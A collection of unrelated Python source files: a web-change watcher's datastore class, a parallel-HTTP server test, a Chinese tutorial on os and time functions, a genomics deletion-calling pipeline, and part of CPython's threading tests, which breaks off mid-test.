def set_last_viewed(self, uuid, timestamp):
self.data['watching'][uuid].update({'last_viewed': int(timestamp)})
self.needs_write = True
def update_watch(self, uuid, update_obj):
# Skip if 'paused' state
if self.__data['watching'][uuid]['paused']:
return
with self.lock:
# In python 3.9 we have the |= dict operator, but that still will lose data on nested structures...
for dict_key, d in self.generic_definition.items():
if isinstance(d, dict):
if update_obj is not None and dict_key in update_obj:
self.__data['watching'][uuid][dict_key].update(update_obj[dict_key])
del (update_obj[dict_key])
self.__data['watching'][uuid].update(update_obj)
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
self.needs_write = True
@property
def data(self):
has_unviewed = False
for uuid, v in self.__data['watching'].items():
self.__data['watching'][uuid]['newest_history_key'] = self.get_newest_history_key(uuid)
if int(v['newest_history_key']) <= int(v['last_viewed']):
self.__data['watching'][uuid]['viewed'] = True
else:
self.__data['watching'][uuid]['viewed'] = False
has_unviewed = True
# #106 - Be sure this is None on empty string, False, None, etc
# Default var for fetch_backend
if not self.__data['watching'][uuid]['fetch_backend']:
self.__data['watching'][uuid]['fetch_backend'] = self.__data['settings']['application']['fetch_backend']
# Re #152, Return env base_url if not overriden, @todo also prefer the proxy pass url
env_base_url = os.getenv('BASE_URL','')
if not self.__data['settings']['application']['base_url']:
self.__data['settings']['application']['base_url'] = env_base_url.strip('" ')
self.__data['has_unviewed'] = has_unviewed
return self.__data
def get_all_tags(self):
tags = []
for uuid, watch in self.data['watching'].items():
# Support for comma separated list of tags.
for tag in watch['tag'].split(','):
tag = tag.strip()
if tag not in tags:
tags.append(tag)
tags.sort()
return tags
def unlink_history_file(self, path):
try:
unlink(path)
except (FileNotFoundError, IOError):
pass
# Delete a single watch by UUID
def delete(self, uuid):
with self.lock:
if uuid == 'all':
self.__data['watching'] = {}
# GitHub #30 also delete history records
for uuid in self.data['watching']:
for path in self.data['watching'][uuid]['history'].values():
self.unlink_history_file(path)
else:
for path in self.data['watching'][uuid]['history'].values():
self.unlink_history_file(path)
del self.data['watching'][uuid]
self.needs_write = True
# Clone a watch by UUID
def clone(self, uuid):
url = self.data['watching'][uuid]['url']
tag = self.data['watching'][uuid]['tag']
extras = self.data['watching'][uuid]
new_uuid = self.add_watch(url=url, tag=tag, extras=extras)
return new_uuid
def url_exists(self, url):
# Probably their should be dict...
for watch in self.data['watching'].values():
if watch['url'] == url:
return True
return False
def get_val(self, uuid, val):
# Probably their should be dict...
return self.data['watching'][uuid].get(val)
# Remove a watchs data but keep the entry (URL etc)
def scrub_watch(self, uuid, limit_timestamp = False):
import hashlib
del_timestamps = []
changes_removed = 0
for timestamp, path in self.data['watching'][uuid]['history'].items():
if not limit_timestamp or (limit_timestamp is not False and int(timestamp) > limit_timestamp):
self.unlink_history_file(path)
del_timestamps.append(timestamp)
changes_removed += 1
if not limit_timestamp:
self.data['watching'][uuid]['last_checked'] = 0
self.data['watching'][uuid]['last_changed'] = 0
self.data['watching'][uuid]['previous_md5'] = 0
for timestamp in del_timestamps:
del self.data['watching'][uuid]['history'][str(timestamp)]
# If there was a limitstamp, we need to reset some meta data about the entry
# This has to happen after we remove the others from the list
if limit_timestamp:
newest_key = self.get_newest_history_key(uuid)
if newest_key:
self.data['watching'][uuid]['last_checked'] = int(newest_key)
# @todo should be the original value if it was less than newest key
self.data['watching'][uuid]['last_changed'] = int(newest_key)
try:
with open(self.data['watching'][uuid]['history'][str(newest_key)], "rb") as fp:
content = fp.read()
self.data['watching'][uuid]['previous_md5'] = hashlib.md5(content).hexdigest()
except (FileNotFoundError, IOError):
self.data['watching'][uuid]['previous_md5'] = False
pass
self.needs_write = True
return changes_removed
def add_watch(self, url, tag, extras=None):
if extras is None:
extras = {}
with self.lock:
# @todo use a common generic version of this
new_uuid = str(uuid_builder.uuid4())
_blank = deepcopy(self.generic_definition)
_blank.update({
'url': url,
'tag': tag
})
# Incase these are copied across, assume it's a reference and deepcopy()
apply_extras = deepcopy(extras)
for k in ['uuid', 'history', 'last_checked', 'last_changed', 'newest_history_key', 'previous_md5', 'viewed']:
if k in apply_extras:
del apply_extras[k]
_blank.update(apply_extras)
self.data['watching'][new_uuid] = _blank
# Get the directory ready
output_path = "{}/{}".format(self.datastore_path, new_uuid)
try:
mkdir(output_path)
except FileExistsError:
print(output_path, "already exists.")
self.sync_to_json()
return new_uuid
# Save some text file to the appropriate path and bump the history
# result_obj from fetch_site_status.run()
def save_history_text(self, watch_uuid, contents):
import uuid
output_path = "{}/{}".format(self.datastore_path, watch_uuid)
fname = "{}/{}.stripped.txt".format(output_path, uuid.uuid4())
with open(fname, 'wb') as f:
f.write(contents)
f.close()
return fname
def sync_to_json(self):
logging.info("Saving JSON..")
try:
data = deepcopy(self.__data)
except RuntimeError as e:
# Try again in 15 seconds
time.sleep(15)
logging.error ("! Data changed when writing to JSON, trying again.. %s", str(e))
self.sync_to_json()
return
else:
try:
# Re #286 - First write to a temp file, then confirm it looks OK and rename it
# This is a fairly basic strategy to deal with the case that the file is corrupted,
# system was out of memory, out of RAM etc
with open(self.json_store_path+".tmp", 'w') as json_file:
json.dump(data, json_file, indent=4)
except Exception as e:
logging.error("Error writing JSON!! (Main JSON file save was skipped) : %s", str(e))
else:
os.rename(self.json_store_path+".tmp", self.json_store_path)
self.needs_write = False
# Thread runner, this helps with thread/write issues when there are many operations that want to update the JSON
# by just running periodically in one thread, according to python, dict updates are threadsafe.
def save_datastore(self):
while True:
if self.stop_thread:
print("Shutting down datastore thread")
return
if self.needs_write:
self.sync_to_json()
# Once per minute is enough, more and it can cause high CPU usage
# better here is to use something like self.app.config.exit.wait(1), but we cant get to 'app' from here
for i in range(30):
time.sleep(2)
if self.stop_thread:
break
# Go through the datastore path and remove any snapshots that are not mentioned in the index
# This usually is not used, but can be handy.
def remove_unused_snapshots(self):
print ("Removing snapshots from datastore that are not in the index..")
index=[]
for uuid in self.data['watching']:
for id in self.data['watching'][uuid]['history']:
index.append(self.data['watching'][uuid]['history'][str(id)])
import pathlib
# Only in the sub-directories
for item in pathlib.Path(self.datastore_path).rglob("*/*txt"):
if not str(item) in index:
print ("Removing",item)
unlink(item)
|
parallelhttp.py
|
import requests
from testsbase import testsbase
import threading
from queue import Queue
from time import sleep, time
class parallelhttp(testsbase):
def __init__(self, config):
super().__init__(config)
self.q = Queue()
def run(self, vh=None):
test_list = [self.test1, self.test2]
return super().run(tests=test_list, vh=vh, testfile='index.html')
def worker(self):
try:
response = requests.get(self.url)
self.q.put((response.status_code == 200) and (self.check_byhash(response)))
except Exception as err:
print(err)
def parallel_clients(self, number_of_treads):
threads = []
for i in range(number_of_treads):
t = threading.Thread(target=self.worker)
threads.append(t)
t.start()
for t in threads:
t.join()
results = [self.q.get() for _ in range(number_of_treads)]
return all(results) and (len(results) == number_of_treads)
def test1(self):
""" 100 connections"""
start = time()
r = self.parallel_clients(100)
return r and (time() - start < 1)
def test2(self):
""" 500 connections """
start = time()
r = self.parallel_clients(500)
return r and (time() - start < 10)
|
python_os_and_time.py
|
def write_date():
import time
now = time.time()
str = time.ctime(now)
fout = open('save_time.txt','wt')
print(str,file=fout)
fout.close()
def list_dir():
import os
print("当前目录下的文件: ",os.listdir('.'),
"\n父目录下的文件: ",os.listdir('../'))
os.chdir('../')
print("父目录下的文件: ",os.listdir('./'))
def do_this():
import os
import random
import time
t = random.randint(1,5)
print("Wait %s seconds, process %s " % (t,os.getpid()))
time.sleep(t)
now = time.time()
print("Process %s End time: %s " % (os.getpid(),time.ctime(now)))
def use_process():
import multiprocessing
for n in range(3):
p = multiprocessing.Process(target=do_this)
p.start()
def use_date():
from datetime import date
birthday = date(2003,6,7)
fmt = "%A"
week = birthday.strftime(fmt)
from datetime import timedelta
one_day = timedelta(days = 1)
the_other_day = one_day * 10000 + birthday
print("生日: ", birthday, \
"\n生日是星期: ",week,\
"\n出生后1万天的日期是: ",the_other_day)
def use_str_date():
import time
str = 'Fri Jul 26 12:36:27 2019'
fmt = "%a %b %d %H:%M:%S %Y"
time1 = time.strptime(str,fmt)
time2 = time.mktime(time1)
time3 = time.ctime(time2)
print("解析后的时间: ",time1,\
"\n纪元值: ",time2,\
"\n转换成字符串: ",time3)
if __name__ == '__main__':
# write_date()
# list_dir()
# use_process()
# use_date()
use_str_date()
|
local_assembly.py
|
#!/usr/bin/env python
import os
import sys
import time
import multiprocessing
try:
from scripts import my_utils
except ImportError:
import my_utils
tab = '\t'
endl = '\n'
arg = sys.argv[1:]
usage = 'python ' + __file__ + ' ' + '<input_bam_file> <out_dir> <out_del_call_file> <n_threads> <ref_fasta> <fermikit_dir> <samtools> <bedtools> '
argc = 0
for i in range(0, len(usage)):
if usage[i] == '<':
argc += 1
class Interval:
def __init__(self, chrom, start_pos, end_pos):
self.chrom = chrom
self.start_pos = int(start_pos)
self.end_pos = int(end_pos)
self.out_dir = ''
self.shell_file = ''
self.shell_cmds = ''
self.region_bed_file = ''
def main():
if len(arg) < argc:
print (usage)
sys.exit()
input_bam_file = os.path.abspath(arg.pop(0))
out_dir = os.path.abspath(arg.pop(0))
out_del_call_file = arg.pop(0)
n_threads = int(arg.pop(0))
ref_fasta_file = os.path.abspath(arg.pop(0))
fermikit_dir = os.path.abspath(arg.pop(0))
samtools = os.path.abspath(arg.pop(0))
bedtools = os.path.abspath(arg.pop(0))
window_size = int(2e5)
faidx_file = ref_fasta_file + '.fai'
max_depth = 500
small_deletion_dection_by_local_assembly(samtools, bedtools, fermikit_dir, input_bam_file, ref_fasta_file, faidx_file, out_dir, out_del_call_file, n_threads, window_size, max_depth)
return
def small_deletion_dection_by_local_assembly(samtools, bedtools, fermikit_dir, input_bam_file, ref_fasta_file, faidx_file, out_dir, out_del_call_file, n_threads, window_size, max_depth, rm_temp_files = 1):
if os.path.exists(faidx_file) == False:
cmd = '%s faidx %s' % (samtools, ref_fasta_file)
my_utils.myprint(cmd)
os.system(cmd)
if os.path.exists(faidx_file) == False:
my_utils.myprint ('ERROR! The index file of the reference fasta file does not exist!' )
sys.exit()
cmd = 'mkdir -p %s' % out_dir
my_utils.myprint(cmd)
os.system('mkdir -p %s' % out_dir)
tid2chrname_list, chrname2tid_dict = my_utils.get_chrnames(faidx_file)
chr_len_list = my_utils.get_chr_length(faidx_file)
overlap_length = int(window_size/10)
interval_list = generate_interval_list(chr_len_list, tid2chrname_list, chrname2tid_dict, window_size, overlap_length)
process_list = list()
out_combined_vcf_file_list = list()
for i in range(0, n_threads):
out_combined_vcf_file = os.path.join(out_dir, 'assembly_raw_variants.%d.txt' % i)
out_combined_vcf_file_list.append(out_combined_vcf_file)
t = multiprocessing.Process(target=small_deletion_dection_from_interval_list, args=(i, n_threads, samtools, bedtools, fermikit_dir, input_bam_file, ref_fasta_file, out_dir, window_size, max_depth, interval_list, out_combined_vcf_file))
process_list.append(t)
t.start()
for t in process_list:
t.join()
all_processes_out_combined_vcf_file = os.path.join(out_dir, 'local_assembly_raw_variants.txt')
cmd = 'cat '
for out_combined_vcf_file in out_combined_vcf_file_list:
cmd += ' %s ' % out_combined_vcf_file
cmd += ' > %s ' % all_processes_out_combined_vcf_file
my_utils.myprint(cmd)
os.system(cmd)
extract_del_from_vcf_file(all_processes_out_combined_vcf_file, out_del_call_file)
if rm_temp_files:
for out_combined_vcf_file in out_combined_vcf_file_list:
os.remove(out_combined_vcf_file)
os.remove(all_processes_out_combined_vcf_file)
return
def small_deletion_dection_from_interval_list(thread_id, n_threads, samtools, bedtools, fermikit_dir, input_bam_file, ref_fasta_file, out_dir, window_size, max_depth, interval_list, out_combined_vcf_file):
out_combined_vcf_fp = open(out_combined_vcf_file, 'w')
out_combined_vcf_fp.write('')
out_combined_vcf_fp.close()
for region_id in range(0, len(interval_list)):
if region_id % n_threads != thread_id: continue
itv = interval_list[region_id]
process1region(samtools, bedtools, fermikit_dir, ref_fasta_file, input_bam_file, out_dir, itv, region_id, window_size, max_depth, 1, out_combined_vcf_file)
return
def process1region(samtools, bedtools, fermikit_dir, ref_fasta_file, input_bam_file, out_dir, itv, region_id, window_size, max_depth, n_threads_for_one_process, out_combined_vcf_file):
curr_out_dir = os.path.join(out_dir, 'region_%06d' % (region_id))
out_bam_file = os.path.join(curr_out_dir, 'region_%06d.bam' % region_id)
out_all_fastq_file = os.path.join(curr_out_dir, 'region_%06d.all.fastq' % region_id)
region_bed_file = os.path.join(curr_out_dir, 'region_%06d.bed' % region_id)
region_fasta_file = os.path.join(curr_out_dir, 'region_%06d.fasta' % region_id)
interval = '%s:%d-%d' % (itv.chrom, itv.start_pos+1, itv.end_pos)
cmd = 'mkdir -p %s' % curr_out_dir
my_utils.myprint(cmd)
os.system(cmd)
time.sleep(0.05)
if os.path.exists(curr_out_dir) == False:
os.system(cmd)
time.sleep(1)
if os.path.exists(curr_out_dir) == False:
my_utils.myprint('Failed to creat directory: %s' % curr_out_dir)
cmd = 'rm -rf %s' % curr_out_dir
my_utils.myprint(cmd)
os.system(cmd)
return
cmd = extract_bam_region(samtools, input_bam_file, interval, out_bam_file, n_threads_for_one_process)
my_utils.myprint(cmd)
os.system(cmd)
cmd = index_bam(samtools, out_bam_file)
my_utils.myprint(cmd)
os.system(cmd)
cmd = bam_to_1fastq(samtools, out_bam_file, out_all_fastq_file)
my_utils.myprint(cmd)
os.system(cmd)
fastq_file_size = os.path.getsize(out_all_fastq_file)
if fastq_file_size > window_size * max_depth * 2 or fastq_file_size < 20000:
cmd = 'rm -r %s' % curr_out_dir
my_utils.myprint(cmd)
os.system(cmd)
return
region_bed_fp = open(region_bed_file, 'w')
region_bed_fp.write('%s\t%d\t%d\n' % (itv.chrom, itv.start_pos, itv.end_pos))
region_bed_fp.close()
cmd = extract_ref_region(bedtools, ref_fasta_file, region_bed_file, region_fasta_file)
my_utils.myprint(cmd)
os.system(cmd)
out_prefix = os.path.join(curr_out_dir, 'region_%06d.all_hap' % region_id)
fermikit_variant_calling(fermikit_dir, samtools, n_threads_for_one_process, region_fasta_file, window_size, out_all_fastq_file, curr_out_dir, out_prefix)
indel_call_file = out_prefix + '.flt.vcf'
sv_call_file = out_prefix + '.sv.vcf'
cmd = 'gunzip --force %s.gz' % indel_call_file
os.system(cmd)
cmd = 'gunzip --force %s.gz' % sv_call_file
os.system(cmd)
cmd = 'cat %s %s >> %s' % (indel_call_file, sv_call_file, out_combined_vcf_file)
os.system(cmd)
cmd = 'rm -r %s' % curr_out_dir
os.system(cmd)
return
def fermikit_variant_calling(fermikit_dir, samtools, n_threads_for_one_process, region_fasta_file, window_size, input_fastq_file, curr_out_dir, out_prefix):
out_mak_file = os.path.join(curr_out_dir, '%s.mak' % out_prefix)
assembly_contigs_file = os.path.join(curr_out_dir, '%s.mag.gz' % out_prefix)
cmd = 'cd %s && %s/bwa index %s' % (curr_out_dir, fermikit_dir, region_fasta_file)
my_utils.myprint(cmd)
os.system(cmd)
cmd = 'cd %s && perl %s/fermi2.pl unitig -s %s -l 151 -t %d -p %s %s > %s\n\n' % (curr_out_dir, fermikit_dir, window_size, n_threads_for_one_process, out_prefix, input_fastq_file, out_mak_file)
my_utils.myprint(cmd)
os.system(cmd)
cmd = 'make -f %s\n\n' % out_mak_file
my_utils.myprint(cmd)
os.system(cmd)
cmd = 'cd %s && perl %s/run-calling -t %d %s %s | sh \n\n' % (curr_out_dir, fermikit_dir, n_threads_for_one_process, region_fasta_file, assembly_contigs_file)
my_utils.myprint(cmd)
os.system(cmd)
return
def extract_bam_region(samtools, input_bam, interval, output_bam, n_threads_for_one_process):
cmd = 'time %s view -1 -hb -@ %d %s %s > %s' % (samtools, n_threads_for_one_process, input_bam, interval, output_bam)
return cmd
def index_bam(samtools, input_bam):
cmd = 'time %s index %s' % (samtools, input_bam)
return cmd
def bam_to_1fastq(samtools, input_bam, out_fastq):
cmd = 'time %s fastq %s > %s' % (samtools, input_bam, out_fastq)
return cmd
def split_bam_by_hap_type(split_hap_type_bam, in_bam_file, out_hap0_bam_file, out_hap1_bam_file, out_hap2_bam_file, out_unmapped_bam_file):
cmd = 'time %s %s %s %s %s %s ' % (split_hap_type_bam, in_bam_file, out_hap0_bam_file, out_hap1_bam_file, out_hap2_bam_file, out_unmapped_bam_file)
return cmd
def extract_ref_region(bedtools, ref_fasta_file, bed_file, out_fasta_file):
cmd = '%s getfasta -fi %s -bed %s -fo %s' % (bedtools, ref_fasta_file, bed_file, out_fasta_file )
return cmd
def generate_interval_list(chr_len_list, tid2chrname_list, chrname2tid_dict, window_size, overlap_length):
interval_list = list()
step_length = window_size - overlap_length
for tid in range(0, len(chr_len_list)):
chrom = tid2chrname_list[tid]
chr_len = chr_len_list[tid]
for start_pos in range(0, chr_len, step_length):
end_pos = start_pos + window_size
if end_pos > chr_len:
end_pos = chr_len
break
itv = Interval(chrom, start_pos, end_pos)
interval_list.append(itv)
if end_pos == chr_len:
break
return interval_list
def extract_del_from_vcf_file(in_vcf_file, out_file):
in_vcf_fp = open(in_vcf_file, 'r')
out_fp = open(out_file, 'w')
min_del_size = 50
id = 0
while 1:
line = in_vcf_fp.readline().strip()
if not line: break
if line[0] == '#' : continue
items = line.split('\t')
chrom1 = items[0]
try:
pos1 = int(items[1])
except:
my_utils.myprint('ERROR! invalid VCF record: %s' % line)
continue
ref_allele = items[3]
alt_allele = items[4]
flt = items[6]
info = items[7]
sv_type = ''
sv_size = 0
pos2 = -1
if '[' in alt_allele or ']' in alt_allele: continue
ref_chr, ref_start_end = chrom1.split(':')
ref_start, ref_end = ref_start_end.split('-')
ref_start = int(ref_start)
chrom1 = ref_chr
pos1 += ref_start
if len(ref_allele) > min_del_size and len(ref_allele) - len(alt_allele) > min_del_size:
sv_type = 'DEL'
sv_size = len(ref_allele) - len(alt_allele)
pos2 = pos1 + sv_size
else:
for ele in info.split(';'):
key = ele.split('=')[0]
if key == 'SVTYPE':
sv_type = ele.split('=')[1]
elif key == 'SVLEN':
sv_size = abs(int(ele.split('=')[1]))
elif key == 'END' and pos2 == -1:
pos2 = int(ele.split('=')[1]) + ref_start
if sv_type != 'DEL': continue
chrom2 = chrom1
flt = 'PASS'
score = 30
sv_id = '.'
out_item = '%s\t%d\t%d\t%s\t%d\t%d\t' % (chrom1, pos1, pos1+1, chrom2, pos2, pos2+1)
out_item += '%s\t%s\t%d\t%d\t%s\tSVMETHOD=local_assembly\n' % (sv_type, sv_id, sv_size, score, flt)
out_fp.write(out_item)
in_vcf_fp.close()
out_fp.close()
return
if __name__ == '__main__':
main()
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import (verbose, import_module, cpython_only,
requires_type_collecting)
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.support.threading_setup()
def tearDown(self):
test.support.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
@test.support.cpython_only
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
@test.support.cpython_only
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
newgil = hasattr(sys, 'getswitchinterval')
if newgil:
geti, seti = sys.getswitchinterval, sys.setswitchinterval
else:
geti, seti = sys.getcheckinterval, sys.setcheckinterval
old_interval = geti()
try:
for i in range(1, 100):
seti(i * 0.0002 if newgil else i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
seti(old_interval)
@test.support.cpython_only
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
with self.assertWarnsRegex(PendingDeprecationWarning, 'use is_alive()'):
t.isAlive()
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
newgil = hasattr(sys, 'getswitchinterval')
if newgil:
geti, seti = sys.getswitchinterval, sys.setswitchinterval
else:
geti, seti = sys.getcheckinterval, sys.setcheckinterval
old_interval = geti()
self.addCleanup(seti, old_interval)
# Make the bug more likely to manifest.
seti(1e-6 if newgil else 1)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
